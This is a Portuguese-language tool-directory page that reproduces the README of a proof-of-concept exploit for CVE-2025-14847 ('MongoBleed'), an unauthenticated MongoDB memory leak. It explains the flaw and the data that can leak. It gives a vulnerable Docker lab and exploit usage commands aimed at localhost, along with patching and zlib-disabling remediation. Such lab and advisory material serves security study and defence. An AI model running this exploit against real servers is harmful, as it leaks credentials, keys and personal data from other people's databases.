Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14847-MongoBleed-Exploit — CVE-2025-14847 MongoBleed - PoC da Vulnerabilidade de Vazamento de Memória do MongoDB | Kitploit
Ferramentas/GitHubGitHub/furkankayapinar/cve-2025-14847-mongobleed-exploit
Forensia de MemóriaAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubfurkankayapinar/cve-2025-14847-mongobleed-exploit

CVE-2025-14847-MongoBleed-Exploit

CVE-2025-14847 MongoBleed - PoC da Vulnerabilidade de Vazamento de Memória do MongoDB

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
122há 9 mesesAinda não revisado

CVE-2025-14847 - MongoBleed

Python License CVE

👨‍💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)

⚠️ APENAS PARA FINS EDUCACIONAIS

Ambiente de laboratório e script de exploração para a vulnerabilidade crítica de vazamento de memória não autenticada no MongoDB Server.


📋 Sumário

  • Visão Geral da Vulnerabilidade
  • Versões Afetadas
  • Instalação
  • Ambiente de Laboratório
  • Uso
  • Remediação
  • Aviso Legal

🔴 Visão Geral da Vulnerabilidade

CVE-2025-14847 (MongoBleed) é uma vulnerabilidade crítica de vazamento de memória não autenticada no manuseio de compressão zlib do MongoDB Server.

AtributoValor
ID CVECVE-2025-14847
Pontuação CVSS8.7 (Alto)
Vetor de AtaqueRede
AutenticaçãoNenhuma Necessária
Data de Divulgação19 de dezembro de 2025

Detalhes Técnicos

A vulnerabilidade existe em message_compressor_zlib.cpp. Ao processar mensagens OP_COMPRESSED:

  1. O atacante envia uma mensagem maliciosa com campos de comprimento inconsistentes
  2. O servidor aloca buffer com base no uncompressedSize declarado
  3. Os dados realmente descomprimidos são menores que o declarado
  4. O servidor retorna o tamanho do buffer alocado em vez do tamanho real dos dados
  5. Memória de heap não inicializada é vazada para o atacante

Impacto

Os dados vazados podem incluir:

  • 🔑 Tokens de autenticação e segredos
  • 🗄️ Dados de sessão do banco de dados
  • 👤 PII (Informações de Identificação Pessoal)
  • 🔐 Chaves de API e senhas
  • ⚙️ Detalhes de configuração

📦 Versões Afetadas

Faixa de VersãoVersão Corrigida
8.2.0 - 8.2.28.2.3
8.0.0 - 8.0.168.0.17
7.0.0 - 7.0.267.0.28
6.0.0 - 6.0.266.0.27
5.0.0 - 5.0.315.0.32
4.4.0 - 4.4.294.4.30
Todas 4.2, 4.0, 3.6EOL - Atualize imediatamente

🚀 Instalação

# Clonar repositório
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB

# Criar ambiente virtual
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# venv\Scripts\activate   # Windows

# Instalar dependências
pip install -r requirements.txt

🧪 Ambiente de Laboratório

Inicie uma instância vulnerável do MongoDB para testes:

cd lab

# Iniciar MongoDB vulnerável (6.0.26 com zlib habilitado)
docker-compose up -d

# Verificar se está em execução
docker-compose ps

# Carregar dados de exemplo (opcional)
./setup.sh load-data

# Parar o laboratório
docker-compose down

💀 Uso

Exploit Básico

# Alvo único
python exploit/mongobleed.py -u 127.0.0.1

# Com porta específica
python exploit/mongobleed.py -u 127.0.0.1 -p 27017

# Salvar dados vazados em arquivo
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin

# Múltiplas iterações para mais dados
python exploit/mongobleed.py -u 127.0.0.1 -i 20

# Modo silencioso (menos saída)
python exploit/mongobleed.py -u 127.0.0.1 -q

# Sem dump hexadecimal (saída de texto)
python exploit/mongobleed.py -u 127.0.0.1 --text

🔧 Remediação

Opção 1: Atualizar (Recomendado)

# Atualizar para a versão corrigida
# Exemplo para MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27

Opção 2: Desativar Compressão zlib

# Iniciar mongod sem zlib
mongod --networkMessageCompressors snappy,zstd

# Ou em mongod.conf
net:
  compression:
    compressors: snappy,zstd

Verificar Correção

python remediation/verify_fix.py --target 127.0.0.1 --port 27017

⚖️ Aviso Legal

🚨 AVISO

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

  • O acesso não autorizado a sistemas de computador é ilegal
  • Você é o único responsável por suas ações
  • Os autores não assumem responsabilidade por uso indevido

Ao usar esta ferramenta, você concorda que possui autorização adequada para testar os sistemas alvo.


📚 Referências

  • NVD - CVE-2025-14847
  • Aviso de Segurança da MongoDB
  • Varonis - Análise do MongoBleed

🤝 Contribuindo

Contribuições são bem-vindas! Por favor, leia CONTRIBUTING.md primeiro.


📄 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE.

Baixar ferramenta